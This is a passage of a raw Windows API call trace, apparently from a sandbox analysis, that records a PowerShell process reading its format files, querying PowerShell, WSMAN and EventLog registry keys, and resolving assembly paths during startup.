	[0412.592] ReadFile (in: hFile=0x2fc, lpBuffer=0x3392ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x3392ca8*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0412.592] SetErrorMode (uMode=0x1) returned 0x1
	[0412.592] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0412.592] SetErrorMode (uMode=0x1) returned 0x1
	[0412.592] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0412.592] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0412.592] CoTaskMemAlloc (cb=0x5a) returned 0x3ba940
	[0412.592] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x3ba940, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0412.592] CoTaskMemFree (pv=0x3ba940) 
	[0412.593] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.593] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x4d10f4a5, Data2=0x3632, Data3=0x49d2, Data4=([0]=0x98, [1]=0xd6, [2]=0x20, [3]=0x11, [4]=0x8e, [5]=0x1d, [6]=0x73, [7]=0x22))) returned 0x0
	[0412.593] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x7259dd84, Data2=0x53d1, Data3=0x49a0, Data4=([0]=0x88, [1]=0xc9, [2]=0x56, [3]=0x3c, [4]=0xc2, [5]=0x19, [6]=0x45, [7]=0x9d))) returned 0x0
	[0412.593] SetErrorMode (uMode=0x1) returned 0x1
	[0412.593] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.593] SetErrorMode (uMode=0x1) returned 0x1
	[0412.593] GetFileType (hFile=0x2fc) returned 0x1
	[0412.593] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d0a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33d0a90*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.593] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d0a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33d0a90*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.594] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d0a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33d0a90*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.594] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d0a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33d0a90*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0412.594] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d0a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33d0a90*, lpNumberOfBytesRead=0x20d158*=0xe98, lpOverlapped=0x0) returned 1
	[0412.594] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d0090, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33d0090*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0412.594] ReadFile (in: hFile=0x2fc, lpBuffer=0x33d0a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x33d0a90*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0412.594] SetErrorMode (uMode=0x1) returned 0x1
	[0412.594] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0412.594] SetErrorMode (uMode=0x1) returned 0x1
	[0412.594] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0412.594] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0412.594] CoTaskMemAlloc (cb=0x5a) returned 0x3ba940
	[0412.595] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x3ba940, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0412.595] CoTaskMemFree (pv=0x3ba940) 
	[0412.595] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.595] VirtualQuery (in: lpAddress=0x20bc80, lpBuffer=0x20cb40, dwLength=0x30 | out: lpBuffer=0x20cb40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.595] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x698517c9, Data2=0x3d2a, Data3=0x4d40, Data4=([0]=0x8c, [1]=0x8, [2]=0xee, [3]=0x9, [4]=0xea, [5]=0xd, [6]=0x70, [7]=0x85))) returned 0x0
	[0412.595] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x11319423, Data2=0x8a2e, Data3=0x4a46, Data4=([0]=0x9c, [1]=0xd2, [2]=0x3, [3]=0x5, [4]=0xb2, [5]=0x7e, [6]=0x4e, [7]=0x73))) returned 0x0
	[0412.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0412.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0412.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0412.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0413.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0413.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0413.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0413.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0413.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0413.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0413.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0413.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0413.797] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0413.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.797] CoTaskMemFree (pv=0x1b91c600) 
	[0413.799] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0413.799] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.799] CoTaskMemFree (pv=0x1b91c600) 
	[0413.800] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0413.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.800] CoTaskMemFree (pv=0x1b91c600) 
	[0413.801] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0413.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.801] CoTaskMemFree (pv=0x1b91c600) 
	[0413.809] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0413.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.809] CoTaskMemFree (pv=0x1b91c600) 
	[0413.811] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0413.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.811] CoTaskMemFree (pv=0x1b91c600) 
	[0413.812] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0413.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.812] CoTaskMemFree (pv=0x1b91c600) 
	[0413.817] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3f8 | out: phkResult=0x20d3f8*=0x2fc) returned 0x0
	[0413.819] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d2fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d2fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0413.819] CoTaskMemFree (pv=0x0) 
	[0413.820] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0413.820] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x33c760, lpcchValueName=0x20d3a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20d3a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0413.820] CoTaskMemFree (pv=0x33c760) 
	[0413.820] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0413.820] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x33c760, lpcchValueName=0x20d3a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20d3a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0413.820] CoTaskMemFree (pv=0x33c760) 
	[0413.820] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0413.820] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x33c760, lpcchValueName=0x20d3a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20d3a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0413.820] CoTaskMemFree (pv=0x33c760) 
	[0413.821] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d38c, lpData=0x0, lpcbData=0x20d388*=0x0 | out: lpType=0x20d38c*=0x1, lpData=0x0, lpcbData=0x20d388*=0x8) returned 0x0
	[0413.821] CoTaskMemAlloc (cb=0xc) returned 0x1b908010
	[0413.821] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d35c, lpData=0x1b908010, lpcbData=0x20d358*=0x8 | out: lpType=0x20d35c*=0x1, lpData="2.0", lpcbData=0x20d358*=0x8) returned 0x0
	[0413.822] CoTaskMemFree (pv=0x1b908010) 
	[0414.543] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d348 | out: phkResult=0x20d348*=0x1c8) returned 0x0
	[0414.543] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d24c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d248, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d24c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d248*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.543] CoTaskMemFree (pv=0x0) 
	[0414.543] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.543] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x0, lpValueName=0x33c760, lpcchValueName=0x20d2f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x20d2f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.543] CoTaskMemFree (pv=0x33c760) 
	[0414.543] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.543] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x1, lpValueName=0x33c760, lpcchValueName=0x20d2f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x20d2f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.543] CoTaskMemFree (pv=0x33c760) 
	[0414.543] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.543] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x2, lpValueName=0x33c760, lpcchValueName=0x20d2f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x20d2f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.544] CoTaskMemFree (pv=0x33c760) 
	[0414.544] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d2dc, lpData=0x0, lpcbData=0x20d2d8*=0x0 | out: lpType=0x20d2dc*=0x1, lpData=0x0, lpcbData=0x20d2d8*=0x8) returned 0x0
	[0414.544] CoTaskMemAlloc (cb=0xc) returned 0x1b908070
	[0414.544] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x20d2ac, lpData=0x1b908070, lpcbData=0x20d2a8*=0x8 | out: lpType=0x20d2ac*=0x1, lpData="2.0", lpcbData=0x20d2a8*=0x8) returned 0x0
	[0414.544] CoTaskMemFree (pv=0x1b908070) 
	[0414.545] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0414.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.545] CoTaskMemFree (pv=0x1b91c600) 
	[0414.550] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0414.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.550] CoTaskMemFree (pv=0x1b91c600) 
	[0414.556] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d378 | out: phkResult=0x20d378*=0x300) returned 0x0
	[0414.560] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d2ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d2ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d2e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.560] CoTaskMemFree (pv=0x0) 
	[0414.561] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.561] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.561] CoTaskMemFree (pv=0x33c760) 
	[0414.561] CoTaskMemFree (pv=0x0) 
	[0414.561] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.561] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.561] CoTaskMemFree (pv=0x33c760) 
	[0414.561] CoTaskMemFree (pv=0x0) 
	[0414.561] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.561] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.561] CoTaskMemFree (pv=0x33c760) 
	[0414.561] CoTaskMemFree (pv=0x0) 
	[0414.561] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.561] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.562] CoTaskMemFree (pv=0x33c760) 
	[0414.562] CoTaskMemFree (pv=0x0) 
	[0414.562] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.562] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.562] CoTaskMemFree (pv=0x33c760) 
	[0414.562] CoTaskMemFree (pv=0x0) 
	[0414.562] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.562] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.562] CoTaskMemFree (pv=0x33c760) 
	[0414.562] CoTaskMemFree (pv=0x0) 
	[0414.562] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.562] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.562] CoTaskMemFree (pv=0x33c760) 
	[0414.562] CoTaskMemFree (pv=0x0) 
	[0414.562] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.562] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.562] CoTaskMemFree (pv=0x33c760) 
	[0414.562] CoTaskMemFree (pv=0x0) 
	[0414.562] CoTaskMemAlloc (cb=0x204) returned 0x33c760
